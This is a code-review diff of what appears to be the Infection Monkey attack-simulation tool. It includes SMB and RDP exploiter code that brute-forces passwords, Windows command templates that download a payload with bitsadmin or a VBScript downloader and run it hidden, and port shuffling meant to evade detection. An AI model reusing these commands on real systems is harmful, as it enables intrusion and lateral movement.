Merge remote-tracking branch 'origin/master'
6fcf8b2f15
|
@ -208,6 +208,8 @@ class Configuration(object):
|
||||||
|
|
||||||
# smb/wmi exploiter
|
# smb/wmi exploiter
|
||||||
smb_download_timeout = 300 # timeout in seconds
|
smb_download_timeout = 300 # timeout in seconds
|
||||||
|
smb_service_name = "InfectionMonkey"
|
||||||
|
|
||||||
|
|
||||||
# system info collection
|
# system info collection
|
||||||
collect_system_info = True
|
collect_system_info = True
|
||||||
|
|
|
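Review bot: The new `smb_service_name` field carries no comment, unlike its neighbour `smb_download_timeout = 300 # timeout in seconds`, and nothing in the class says where the value is consumed. I would write it as `smb_service_name = "InfectionMonkey"  # service name and display name of the service the SMB exploiter registers through the SCM`, since the SmbExploiter hunk in this same commit passes it as both name arguments to `hRCreateServiceW`. The Configuration class continues outside the hunk.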
@ -66,6 +66,7 @@
|
||||||
"range_size": 30,
|
"range_size": 30,
|
||||||
"rdp_use_vbs_download": true,
|
"rdp_use_vbs_download": true,
|
||||||
"smb_download_timeout": 300,
|
"smb_download_timeout": 300,
|
||||||
|
"smb_service_name": "InfectionMonkey",
|
||||||
"retry_failed_explotation": true,
|
"retry_failed_explotation": true,
|
||||||
"scanner_class": "TcpScanner",
|
"scanner_class": "TcpScanner",
|
||||||
"self_delete_in_cleanup": true,
|
"self_delete_in_cleanup": true,
|
||||||
|
|
|
@ -103,6 +103,7 @@ class KeyPressRDPClient(rdp.RDPClientObserver):
|
||||||
self._update_lock.release()
|
self._update_lock.release()
|
||||||
|
|
||||||
def _keysSender(self):
|
def _keysSender(self):
|
||||||
|
LOG.debug("Starting to send keystrokes")
|
||||||
while True:
|
while True:
|
||||||
|
|
||||||
if self.closed:
|
if self.closed:
|
||||||
|
@ -260,6 +261,8 @@ class RdpExploiter(HostExploiter):
|
||||||
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
|
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
LOG.info("Started http server on %s", http_path)
|
||||||
|
|
||||||
cmdline = build_monkey_commandline(host, depth-1)
|
cmdline = build_monkey_commandline(host, depth-1)
|
||||||
|
|
||||||
if self._config.rdp_use_vbs_download:
|
if self._config.rdp_use_vbs_download:
|
||||||
|
@ -286,9 +289,11 @@ class RdpExploiter(HostExploiter):
|
||||||
for password in passwords:
|
for password in passwords:
|
||||||
try:
|
try:
|
||||||
# run command using rdp.
|
# run command using rdp.
|
||||||
LOG.info("Trying rdp logging into victim %r with user %s and password '%s'",
|
LOG.info("Trying RDP logging into victim %r with user %s and password '%s'",
|
||||||
host, self._config.psexec_user, password)
|
host, self._config.psexec_user, password)
|
||||||
|
|
||||||
|
LOG.info("RDP logged in to %r", host)
|
||||||
|
|
||||||
client_factory = CMDClientFactory(self._config.psexec_user, password, "", command)
|
client_factory = CMDClientFactory(self._config.psexec_user, password, "", command)
|
||||||
|
|
||||||
reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory)
|
reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory)
|
||||||
|
|
|
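Review bot: The new `LOG.info("RDP logged in to %r", host)` is emitted before `CMDClientFactory` is built and before `reactor.connectTCP` is even scheduled, so it reports a successful login for every password in the loop regardless of outcome. Because the connection is made asynchronously through the reactor, the message should either state what is actually known at that point, e.g. `LOG.info("Scheduling RDP connection to %r with user %s", host, self._config.psexec_user)`, or move to wherever the client observes the login result. The `for password in passwords` body and the enclosing method continue outside the hunk. The pre-existing line just above it still logs the cleartext password at INFO level; that is not introduced here, but it is worth reconsidering in the same pass.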
@ -92,7 +92,6 @@ class ShellShockExploiter(HostExploiter):
|
||||||
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
|
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
# copy the monkey
|
# copy the monkey
|
||||||
dropper_target_path_linux = self._config.dropper_target_path_linux
|
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||||||
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||||
|
@ -193,7 +192,7 @@ class ShellShockExploiter(HostExploiter):
|
||||||
Checks if which urls exist
|
Checks if which urls exist
|
||||||
:return: Sequence of URLs to try and attack
|
:return: Sequence of URLs to try and attack
|
||||||
"""
|
"""
|
||||||
import grequests
|
import grequests # at this point, it monkey patches half the world and we must stop it
|
||||||
attack_path = 'http://'
|
attack_path = 'http://'
|
||||||
if is_https:
|
if is_https:
|
||||||
attack_path = 'https://'
|
attack_path = 'https://'
|
||||||
|
@ -203,6 +202,10 @@ class ShellShockExploiter(HostExploiter):
|
||||||
resps = grequests.map(reqs, size=15)
|
resps = grequests.map(reqs, size=15)
|
||||||
valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
|
valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
|
||||||
urls = [resp.url for resp in valid_resps]
|
urls = [resp.url for resp in valid_resps]
|
||||||
|
|
||||||
|
# revert monkey patch
|
||||||
|
import socket # this is the monkeypatched socket module
|
||||||
|
reload(socket)
|
||||||
return urls
|
return urls
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
|
|
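Review bot: `reload(socket)` runs only on the success path after `grequests.map`, so if `map` raises the monkey-patched socket module stays in place for the rest of the process; the revert belongs in a `finally:` around the `grequests.map` call. The comment should also say what the reload does and does not undo: it restores the `socket` module object, but any module that bound `socket.socket` or similar names before this point keeps the patched objects, and if gevent's `patch_all` (which grequests invokes) also patched `ssl`, `time` or `os`, those are not reverted here — I cannot confirm the exact patch set from this page. The enclosing method starts outside the hunk.
```python
        # … unchanged: building reqs …
        try:
            resps = grequests.map(reqs, size=15)
        finally:
            # revert the monkey patch even if map() raised; this restores only the
            # socket module object itself, names bound earlier keep the patched objects
            import socket  # this is the monkeypatched socket module
            reload(socket)
        valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
        urls = [resp.url for resp in valid_resps]
        return urls
```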
@ -141,7 +141,7 @@ class SmbExploiter(HostExploiter):
|
||||||
sc_handle = resp['lpScHandle']
|
sc_handle = resp['lpScHandle']
|
||||||
|
|
||||||
# start the monkey using the SCM
|
# start the monkey using the SCM
|
||||||
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, "Chaos Monkey", "Chaos Monkey",
|
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name,
|
||||||
lpBinaryPathName=cmdline)
|
lpBinaryPathName=cmdline)
|
||||||
service = resp['lpServiceHandle']
|
service = resp['lpServiceHandle']
|
||||||
|
|
||||||
|
|
|
@ -10,5 +10,5 @@ DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER
|
||||||
MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
|
||||||
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
|
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
|
||||||
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, )
|
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, )
|
||||||
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
|
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("WinHttp.WinHttpRequest.5.1")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
|
||||||
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
||||||
|
|
|
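Review bot: The change from `MSXML2.XMLHTTP` to `WinHttp.WinHttpRequest.5.1` inside `RDP_CMDLINE_HTTP_VBS` is buried in a several-hundred-character literal, and the commit (a merge) does not record why it was made. A one-line comment above the constant, e.g. `# WinHttp.WinHttpRequest.5.1 replaces MSXML2.XMLHTTP; reason: <fill in>`, would save the next reader from diffing the strings by hand. Building the literal from a list of short fragments joined with `&` would also make future diffs of this constant readable instead of one changed 700-character line.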
@ -1,4 +1,5 @@
|
||||||
import time
|
import time
|
||||||
|
from random import shuffle
|
||||||
from network import HostScanner, HostFinger
|
from network import HostScanner, HostFinger
|
||||||
from model.host import VictimHost
|
from model.host import VictimHost
|
||||||
from network.tools import check_port_tcp
|
from network.tools import check_port_tcp
|
||||||
|
@ -19,8 +20,11 @@ class TcpScanner(HostScanner, HostFinger):
|
||||||
assert isinstance(host, VictimHost)
|
assert isinstance(host, VictimHost)
|
||||||
|
|
||||||
count = 0
|
count = 0
|
||||||
|
# maybe hide under really bad detection systems
|
||||||
|
target_ports = self._config.tcp_target_ports[:]
|
||||||
|
shuffle(target_ports)
|
||||||
|
|
||||||
for target_port in self._config.tcp_target_ports:
|
for target_port in target_ports:
|
||||||
|
|
||||||
is_open, banner = check_port_tcp(host.ip_addr,
|
is_open, banner = check_port_tcp(host.ip_addr,
|
||||||
target_port,
|
target_port,
|
||||||
|
|
|
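Review bot: The copy-then-shuffle pair `target_ports = self._config.tcp_target_ports[:]` / `shuffle(target_ports)` can be one line with `random.sample`, which returns a new shuffled list and also works if the config value is ever a tuple (where `shuffle` raises on item assignment): `target_ports = sample(self._config.tcp_target_ports, len(self._config.tcp_target_ports))` with `from random import sample`. The comment `# maybe hide under really bad detection systems` should say what the code does rather than speculate, e.g. `# scan the configured ports in random rather than ascending order`. The enclosing method starts outside the hunk.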
@ -315,4 +315,12 @@ api.add_resource(Connector, '/connector')
|
||||||
api.add_resource(JobCreation, '/jobcreate')
|
api.add_resource(JobCreation, '/jobcreate')
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
app.run(host='0.0.0.0', debug=True, ssl_context=('server.crt', 'server.key'))
|
from tornado.wsgi import WSGIContainer
|
||||||
|
from tornado.httpserver import HTTPServer
|
||||||
|
from tornado.ioloop import IOLoop
|
||||||
|
|
||||||
|
http_server = HTTPServer(WSGIContainer(app), ssl_options={'certfile': 'server.crt', 'keyfile': 'server.key'})
|
||||||
|
http_server.listen(5000)
|
||||||
|
IOLoop.instance().start()
|
||||||
|
|
||||||
|
#app.run(host='0.0.0.0', debug=True, ssl_context=('server.crt', 'server.key'))
|
||||||
|
|
|
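Review bot: `http_server.listen(5000)` and the `ssl_options` dict keep the old behaviour only implicitly: with no `address` Tornado binds every interface (the removed line said `host='0.0.0.0'` explicitly), and a dict of `certfile`/`keyfile` leaves protocol version and cipher selection to Tornado's defaults. Passing an `ssl.SSLContext` built with `ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)` makes the TLS policy explicit and gives one place to tighten it later, and naming the bind address documents the exposure of this server. The commented-out `#app.run(...)` line at the end should be dropped now that the Tornado path replaces it. The rewrite needs `import ssl` in the file's import block, which is outside this hunk.
```python
if __name__ == '__main__':
    # … unchanged: tornado imports …

    # explicit TLS policy instead of tornado's dict defaults (requires `import ssl` at file top)
    ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    ssl_ctx.load_cert_chain('server.crt', 'server.key')
    http_server = HTTPServer(WSGIContainer(app), ssl_options=ssl_ctx)
    http_server.listen(5000, address='0.0.0.0')  # explicit: all interfaces, as before
    IOLoop.instance().start()
```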
@ -1,3 +1,4 @@
|
||||||
pyVmomi
|
pyVmomi
|
||||||
celery
|
celery
|
||||||
celery[mongodb]
|
celery[mongodb]
|
||||||
|
tornado
|
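Review bot: `tornado` is added without a version specifier, matching the rest of the file but leaving the installed version to whatever pip resolves on install day; a pin such as `tornado==<pinned-version>` (placeholder) would make the install reproducible. Since this package now terminates TLS for the server started in main.py, a pin also turns security updates into a deliberate, reviewable change rather than a silent one.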